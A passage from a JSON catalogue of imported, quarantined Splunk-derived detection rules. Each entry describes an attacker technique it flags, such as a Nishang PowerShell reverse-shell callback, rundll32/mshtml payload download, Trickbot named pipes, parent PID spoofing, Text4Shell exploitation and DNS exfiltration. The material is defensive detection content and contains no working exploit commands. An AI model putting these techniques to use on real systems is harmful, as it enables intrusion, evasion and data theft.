This activity is significant because enabling PowerShell Web Access can facilitate remote execution of PowerShell commands, potentially allowing an attacker to gain unauthorized access to systems and networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-enable-powershell-web-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "175bb2de-6227-416b-9678-9b61999cd21f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_enable_powershell_web_access.yml" } }, { "id": "splunk-security-content-178d696d-6dc6-4ee8-9d25-93fee34eaf5b", "type": "detection", "name": "Azure Automation Runbook Created", "description": "The following analytic detects the creation of a new Azure Automation Runbook within an Azure tenant. It leverages Azure Audit events, specifically the Azure Activity log category, to identify when a new Runbook is created or updated. This activity is significant because adversaries with privileged access can use Runbooks to maintain persistence, escalate privileges, or execute malicious code. 
If confirmed malicious, this could lead to unauthorized actions such as creating Global Administrators, executing code on VMs, and compromising the entire Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-automation-runbook-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "178d696d-6dc6-4ee8-9d25-93fee34eaf5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_automation_runbook_created.yml" } }, { "id": "splunk-security-content-17cd75b2-8666-11eb-9ab4-acde48001122", "type": "detection", "name": "High Process Termination Frequency", "description": "The following analytic identifies a high frequency of process termination events on a computer within a short period. It leverages Sysmon EventCode 5 logs to detect instances where 15 or more processes are terminated within a 3-second window. This behavior is significant as it is commonly associated with ransomware attempting to avoid exceptions during file encryption. 
If confirmed malicious, this activity could indicate an active ransomware attack, potentially leading to widespread file encryption and significant data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-process-termination-frequency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17cd75b2-8666-11eb-9ab4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/high_process_termination_frequency.yml" } }, { "id": "splunk-security-content-17e9b764-3a2b-4d36-9751-32d13ce4718b", "type": "detection", "name": "Cisco Secure Firewall - Blocked Connection", "description": "The following analytic detects a blocked connection event by identifying a \"Block\" value in the action field. It leverages logs from Cisco Secure Firewall Threat Defense devices. This activity is significant as it can identify attempts from users or applications initiating network connection to explicitly or implicitly blocked range or zones. 
If confirmed malicious, attackers could be attempting to perform a forbidden action on the network such as data exfiltration, lateral movement, or network disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1046", "T1110", "T1203", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-blocked-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17e9b764-3a2b-4d36-9751-32d13ce4718b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___blocked_connection.yml" } }, { "id": "splunk-security-content-17f8f69c-5d00-4c88-9c6f-493bbdef20a1", "type": "detection", "name": "Windows Parent PID Spoofing with Explorer", "description": "The following analytic identifies a suspicious `explorer.exe` process with the `/root` command-line parameter. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process and command-line data. The presence of `/root` in `explorer.exe` is significant as it may indicate parent process spoofing, a technique used by malware to evade detection. 
If confirmed malicious, this activity could allow an attacker to operate undetected, potentially leading to unauthorized access, privilege escalation, or persistent threats within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-parent-pid-spoofing-with-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17f8f69c-5d00-4c88-9c6f-493bbdef20a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml" } }, { "id": "splunk-security-content-1804b0a4-a682-11eb-8f68-acde48001122", "type": "detection", "name": "Trickbot Named Pipe", "description": "The following analytic detects the creation or connection to a named pipe associated with Trickbot malware. It leverages Sysmon EventCodes 17 and 18 to identify named pipes with the pattern \"\\\\pipe\\\\*lacesomepipe\". This activity is significant as Trickbot uses named pipes for communication with its command and control (C2) servers, facilitating data exfiltration and command execution. 
If confirmed malicious, this behavior could allow attackers to maintain persistence, execute arbitrary commands, and exfiltrate sensitive information from the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/trickbot-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1804b0a4-a682-11eb-8f68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/trickbot_named_pipe.yml" } }, { "id": "splunk-security-content-182ba99f-2dde-4cdb-8e5c-e3b1e251cb10", "type": "detection", "name": "Windows SQL Server Extended Procedure DLL Loading Hunt", "description": "This analytic detects when SQL Server loads DLLs to execute extended stored procedures. This is particularly important for security monitoring as it indicates the first-time use or version changes of potentially dangerous procedures like xp_cmdshell, sp_OACreate, and others. 
While this is a legitimate operation, adversaries may abuse these procedures for execution, discovery, or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001", "T1059.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-extended-procedure-dll-loading-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "182ba99f-2dde-4cdb-8e5c-e3b1e251cb10", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_extended_procedure_dll_loading_hunt.yml" } }, { "id": "splunk-security-content-187bf937-c436-4c65-bbcb-7539ffe02da1", "type": "detection", "name": "Windows AD Privileged Group Modification", "description": "This detection identifies when users are added to privileged Active Directory\ngroups by leveraging the Windows Security Event Code 4728 along with a lookup\nof privileged AD groups provided by Splunk Enterprise Security.\nAttackers often add user accounts to privileged AD groups to escalate privileges\nor maintain persistence within an Active Directory environment.\nMonitoring for modifications to privileged groups can help identify potential security breaches\nand unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-ad-privileged-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "187bf937-c436-4c65-bbcb-7539ffe02da1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_group_modification.yml" } }, { "id": "splunk-security-content-18916468-9c04-11ec-bdc6-acde48001122", "type": "detection", "name": "Kerberos TGT Request Using RC4 Encryption", "description": "The following analytic detects a Kerberos Ticket Granting Ticket (TGT) request using RC4-HMAC encryption (type 0x17) by leveraging Event 4768. This encryption type is outdated and its presence may indicate an OverPass The Hash attack. Monitoring this activity is crucial as it can signify credential theft, allowing adversaries to authenticate to the Kerberos Distribution Center (KDC) using a stolen NTLM hash. 
If confirmed malicious, this could enable unauthorized access to systems and resources, potentially leading to lateral movement and further compromise within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-tgt-request-using-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18916468-9c04-11ec-bdc6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_tgt_request_using_rc4_encryption.yml" } }, { "id": "splunk-security-content-18b5a1a0-6326-11ec-943a-acde48001122", "type": "detection", "name": "Linux Insert Kernel Module Using Insmod Utility", "description": "The following analytic detects the insertion of a Linux kernel module using the insmod utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process names and command-line details. This activity is significant as it may indicate the installation of a rootkit or malicious kernel module, potentially allowing an attacker to gain elevated privileges and bypass security detections. 
If confirmed malicious, this could lead to unauthorized code execution, persistent access, and severe compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-insert-kernel-module-using-insmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18b5a1a0-6326-11ec-943a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_insert_kernel_module_using_insmod_utility.yml" } }, { "id": "splunk-security-content-18f0d27d-569e-4bc4-96e1-09b214fa73c0", "type": "detection", "name": "Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download", "description": "This analytic detects suspicious use of `rundll32.exe` in combination with `mshtml.dll` and the export `RunHTMLApplication`.\nThis behavior is often observed in malware to execute JavaScript or VBScript in memory, enabling payload staging or\nbypassing script execution policies and bypassing the usage of the \"mshta.exe\" binary.\nThe detection leverages Cisco Network Visibility Module telemetry which offers network flow activity\nalong with process information such as command-line arguments\nIf confirmed malicious, this activity may indicate initial access or payload download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-rundll32-abuse-of-mshtml-dll-for-payload-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18f0d27d-569e-4bc4-96e1-09b214fa73c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___rundll32_abuse_of_mshtml_dll_for_payload_download.yml" } }, { "id": "splunk-security-content-193769d3-1e33-43a9-970e-ad4a88256cdb", "type": "detection", "name": "Windows AD Short Lived Server Object", "description": "The following analytic identifies the creation and quick deletion of a Domain Controller (DC) object within 30 seconds in an Active Directory environment, indicative of a potential DCShadow attack. This detection leverages Windows Security Event Codes 5137 and 5141, analyzing the duration between these events. This activity is significant as DCShadow allows attackers with privileged access to register a rogue DC, enabling unauthorized changes to AD objects, including credentials. 
If confirmed malicious, this could lead to unauthorized AD modifications, compromising the integrity and security of the entire domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-server-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "193769d3-1e33-43a9-970e-ad4a88256cdb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_server_object.yml" } }, { "id": "splunk-security-content-196ff536-58d9-4d1b-9686-b176b04e430b", "type": "detection", "name": "Windows Service Stop By Deletion", "description": "The following analytic detects the use of `sc.exe` to delete a Windows service. It leverages Endpoint Detection and Response (EDR) data, focusing on process execution logs that capture command-line arguments. This activity is significant because adversaries often delete services to disable security mechanisms or critical system functions, aiding in evasion and persistence. 
If confirmed malicious, this action could lead to the termination of essential security services, allowing attackers to operate undetected and potentially escalate their privileges or maintain long-term access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-by-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "196ff536-58d9-4d1b-9686-b176b04e430b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_by_deletion.yml" } }, { "id": "splunk-security-content-1984f997-3b49-4d4b-a7e9-dc5dbf88370e", "type": "detection", "name": "Cisco NVM - Webserver Download From File Sharing Website", "description": "This analytic detects unexpected outbound network connections initiated by known webserver processes such as `httpd.exe`, `nginx.exe`, or `tomcat.exe` to common file sharing or public content hosting services like GitHub, Discord CDN, Transfer.sh, or Pastebin.\nWebservers are rarely expected to perform outbound downloads, especially to dynamic or anonymous file hosting domains. 
This behavior is often associated with server compromise,\nwhere an attacker uses a reverse shell, webshell, or injected task to fetch malware or tools post-exploitation.\nThe detection leverages Cisco Network Visibility Module flow data, enriched with process context, to identify this highly suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-webserver-download-from-file-sharing-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1984f997-3b49-4d4b-a7e9-dc5dbf88370e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___webserver_download_from_file_sharing_website.yml" } }, { "id": "splunk-security-content-19a481e0-c97c-4d14-b1db-75a708eb592e", "type": "detection", "name": "Exploit Public Facing Application via Apache Commons Text", "description": "The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. 
If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exploit-public-facing-application-via-apache-commons-text.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19a481e0-c97c-4d14-b1db-75a708eb592e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/exploit_public_facing_application_via_apache_commons_text.yml" } }, { "id": "splunk-security-content-19b53215-4a16-405b-8087-9e6acf619842", "type": "detection", "name": "GCP Kubernetes cluster pod scan detection", "description": "The following analytic identifies unauthenticated requests to Kubernetes cluster pods. It detects this activity by analyzing GCP Pub/Sub messages for audit logs where the response status code is 401, indicating unauthorized access attempts. This activity is significant for a SOC because it may indicate reconnaissance or scanning attempts by an attacker trying to identify vulnerable pods. 
If confirmed malicious, this activity could lead to unauthorized access, allowing the attacker to exploit vulnerabilities within the cluster, potentially compromising sensitive data or gaining control over the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-kubernetes-cluster-pod-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19b53215-4a16-405b-8087-9e6acf619842", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_kubernetes_cluster_pod_scan_detection.yml" } }, { "id": "splunk-security-content-19ec30ad-faa2-496a-a6a9-f2e5f778fbdb", "type": "detection", "name": "Ollama Abnormal Network Connectivity", "description": "Detects abnormal network activity and connectivity issues in Ollama including non-localhost API access attempts and warning-level network errors such as DNS lookup failures, TCP connection issues, or host resolution problems that may indicate network-based attacks, unauthorized access attempts, or infrastructure reconnaissance activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-abnormal-network-connectivity.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19ec30ad-faa2-496a-a6a9-f2e5f778fbdb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_abnormal_network_connectivity.yml" } }, { "id": "splunk-security-content-1a058296-7c68-4d66-9560-464764d6e26c", "type": "detection", "name": "Windows RDP Server Registry Deletion", "description": "This detection identifies the deletion of registry keys under HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\, which store records of previously connected remote systems via Remote Desktop Protocol (RDP). These keys are created automatically when a user connects to a remote host using the native Windows RDP client (mstsc.exe) and can be valuable forensic artifacts for tracking remote access activity. Malicious actors aware of this behavior may delete these keys after using RDP to hide evidence of their activity and avoid detection during incident response. This form of artifact cleanup is a known defense evasion technique, often performed during or after lateral movement. Legitimate users rarely delete these keys manually, making such actions highly suspicious\u2014especially when correlated with RDP usage, unusual logon behavior, or other signs of compromise. 
Detecting the deletion of these registry entries can provide crucial insight into attempts to cover tracks following interactive remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-server-registry-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a058296-7c68-4d66-9560-464764d6e26c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_server_registry_deletion.yml" } }, { "id": "splunk-security-content-1a06689d-814e-4db2-b2c7-5a174f8c2d6d", "type": "detection", "name": "Windows MSIX Package Interaction", "description": "This hunting query detects user interactions with MSIX packages by monitoring EventCode 171 in the Microsoft-Windows-AppXPackaging/Operational logs. These events are generated when a user clicks on or attempts to interact with an MSIX package, even if the package is not fully installed. This information can be valuable for security teams to identify what MSIX packages users are attempting to open in their environment, which may help detect malicious MSIX packages before they're fully installed. 
Monitoring these interactions can provide early warning of potential MSIX package abuse, which has been leveraged by threat actors such as FIN7, Zloader (Storm-0569), and FakeBat (Storm-1113).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msix-package-interaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a06689d-814e-4db2-b2c7-5a174f8c2d6d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msix_package_interaction.yml" } }, { "id": "splunk-security-content-1a382c6c-7c2e-11eb-ac69-acde48001122", "type": "detection", "name": "Nishang PowershellTCPOneLine", "description": "The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server. It leverages Endpoint Detection and Response (EDR) data, focusing on PowerShell processes that include specific .NET classes like Net.Sockets.TCPClient and System.Text.ASCIIEncoding. This activity is significant as it indicates potential remote control or data exfiltration attempts by an attacker. 
If confirmed malicious, this could lead to unauthorized remote access, data theft, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nishang-powershelltcponeline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a382c6c-7c2e-11eb-ac69-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/nishang_powershelltcponeline.yml" } }, { "id": "splunk-security-content-1a537acc-199f-4713-b5d7-3d98c05ab932", "type": "detection", "name": "MOVEit Empty Key Fingerprint Authentication Attempt", "description": "This detection identifies attempts to authenticate with an empty public key fingerprint in Progress MOVEit Transfer, which is a key indicator of potential exploitation of the CVE-2024-5806 vulnerability. Such attempts are characteristic of the authentication bypass technique used in this vulnerability, where attackers try to impersonate valid users without providing proper credentials. While occasional empty key fingerprint authentication attempts might occur due to misconfigurations, a sudden increase or attempts from unexpected sources could signify malicious activity. 
This analytic helps security teams identify and investigate potential exploitation attempts of the MOVEit Transfer authentication bypass vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/moveit-empty-key-fingerprint-authentication-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a537acc-199f-4713-b5d7-3d98c05ab932", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/moveit_empty_key_fingerprint_authentication_attempt.yml" } }, { "id": "splunk-security-content-1a67f15a-f4ff-4170-84e9-08cf6f75d6f5", "type": "detection", "name": "DNS Query Length With High Standard Deviation", "description": "The following analytic identifies DNS queries with unusually large lengths by computing the standard deviation of query lengths and filtering those exceeding two times the standard deviation. It leverages DNS query data from the Network_Resolution data model, focusing on the length of the domain names being resolved. This activity is significant as unusually long DNS queries can indicate data exfiltration or command-and-control communication attempts. 
If confirmed malicious, this activity could allow attackers to stealthily transfer data or maintain persistent communication channels within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-query-length-with-high-standard-deviation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a67f15a-f4ff-4170-84e9-08cf6f75d6f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/dns_query_length_with_high_standard_deviation.yml" } }, { "id": "splunk-security-content-1a77c08c-2f56-409c-a2d3-7d64617edd4f", "type": "detection", "name": "No Windows Updates in a time frame", "description": "The following analytic identifies Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. It leverages the 'Update' data model in Splunk, specifically looking for the latest 'Installed' status events from Microsoft Windows. This activity is significant for a SOC because endpoints that are not regularly patched are vulnerable to known exploits and security vulnerabilities. 
If confirmed malicious, this could indicate a compromised endpoint that is intentionally being kept unpatched, potentially allowing attackers to exploit unpatched vulnerabilities and gain unauthorized access or control.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/no-windows-updates-in-a-time-frame.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a77c08c-2f56-409c-a2d3-7d64617edd4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/no_windows_updates_in_a_time_frame.yml" } }, { "id": "splunk-security-content-1a7e7650-b81d-492e-99d4-d5ab633afbdd", "type": "detection", "name": "Windows Unusual Process Load Mozilla NSS-Mozglue Module", "description": "The following analytic identifies processes loading Mozilla NSS-Mozglue libraries such as mozglue.dll and nss3.dll. It leverages Sysmon Event logs, specifically monitoring EventCode 7, which tracks image loaded events. This activity is significant because it can indicate unauthorized access or manipulation of these libraries, which are commonly used by Mozilla applications like Firefox and Thunderbird. 
If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-process-load-mozilla-nss-mozglue-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a7e7650-b81d-492e-99d4-d5ab633afbdd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_process_load_mozilla_nss_mozglue_module.yml" } }, { "id": "splunk-security-content-1abce487-f480-4d5f-a551-01de0bece0bd", "type": "detection", "name": "Cisco TFTP Server Configuration for Data Exfiltration", "description": "This analytic detects the configuration of TFTP services on Cisco IOS devices that could be used to exfiltrate sensitive configuration 